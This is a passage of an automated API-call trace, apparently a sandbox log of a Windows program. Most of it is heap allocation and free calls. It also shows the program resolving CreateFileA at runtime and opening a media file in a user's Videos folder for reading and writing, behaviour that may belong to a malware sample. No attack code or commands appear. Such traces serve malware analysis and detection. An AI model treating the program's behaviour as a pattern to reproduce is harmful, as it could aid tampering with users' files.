lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0199.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0199.455] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0199.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0199.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.458] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.461] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0199.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd630 [0199.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd630, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0199.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.461] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0199.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0199.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd630, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0199.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.462] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0199.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0199.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa548 [0199.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", cchWideChar=71, lpMultiByteStr=0x9aa548, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", lpUsedDefaultChar=0x0) returned 71 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.462] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\ioptjd0u8gbyjv6.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=71, lpWideCharStr=0x0, cchWideChar=0 | out: 